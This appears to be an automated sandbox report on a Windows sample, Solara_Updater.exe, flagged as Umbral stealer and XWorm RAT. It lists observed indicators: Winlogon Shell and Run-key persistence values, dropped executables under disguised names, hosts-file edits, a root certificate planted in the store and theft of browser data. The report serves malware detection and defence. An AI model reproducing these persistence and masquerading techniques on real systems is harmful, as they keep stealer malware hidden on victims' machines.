Malware Analysis Report

2024-10-10 10:00

Sample ID 240519-tqhq5seg43
Target Solara_Updater.exe
SHA256 4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf
Tags
umbral xworm execution persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf

Threat Level: Known bad

The file Solara_Updater.exe was found to be: Known bad.

Malicious Activity Summary

umbral xworm execution persistence rat spyware stealer trojan

Modifies WinLogon for persistence

Xworm

Detect Xworm Payload

Umbral

Process spawned unexpected child process

Detect Umbral payload

Blocklisted process makes network request

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Drops startup file

Adds Run key to start application

Looks up external IP address via web service

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious behavior: CmdExeWriteProcessMemorySpam

Creates scheduled task(s)

Detects videocard installed

Views/modifies file attributes

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Suspicious use of WriteProcessMemory

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-19 16:15

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-19 16:15

Reported

2024-05-19 16:18

Platform

win7-20240508-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\", \"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\", \"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\", \"C:\\Program Files\\7-Zip\\Loader.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\", \"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\", \"C:\\Program Files\\7-Zip\\Loader.exe\", \"C:\\Program Files\\Windows Mail\\en-US\\sppsvc.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\", \"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\", \"C:\\Program Files\\7-Zip\\Loader.exe\", \"C:\\Program Files\\Windows Mail\\en-US\\sppsvc.exe\", \"C:\\Windows\\PCHEALTH\\ERRORREP\\QHEADLES\\System.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\", \"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\", \"C:\\Program Files\\7-Zip\\Loader.exe\", \"C:\\Program Files\\Windows Mail\\en-US\\sppsvc.exe\", \"C:\\Windows\\PCHEALTH\\ERRORREP\\QHEADLES\\System.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Program Files\Windows Mail\en-US\sppsvc.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\PCHEALTH\\ERRORREP\\QHEADLES\\System.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\PCHEALTH\\ERRORREP\\QHEADLES\\System.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Windows Mail\\en-US\\sppsvc.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Windows Mail\\en-US\\sppsvc.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\hostNet\\taskhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\Loader = "\"C:\\Program Files\\7-Zip\\Loader.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Loader = "\"C:\\Program Files\\7-Zip\\Loader.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\hostNet\\taskhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\bsgne1.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\CSC2FEC2B28D6C643E49C6489917F1F18A0.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Windows Mail\en-US\sppsvc.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Program Files\Windows Mail\en-US\0a1fd5f707cd16 C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Program Files\7-Zip\Loader.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Program Files\7-Zip\87ba48885c7d9e C:\hostNet\bridgeblockportComBroker.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\PCHEALTH\ERRORREP\QHEADLES\System.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File opened for modification C:\Windows\PCHEALTH\ERRORREP\QHEADLES\System.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Windows\PCHEALTH\ERRORREP\QHEADLES\27d1bcfc3c54e0 C:\hostNet\bridgeblockportComBroker.exe N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\hostNet\bridgeblockportComBroker.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Program Files\Windows Mail\en-US\sppsvc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
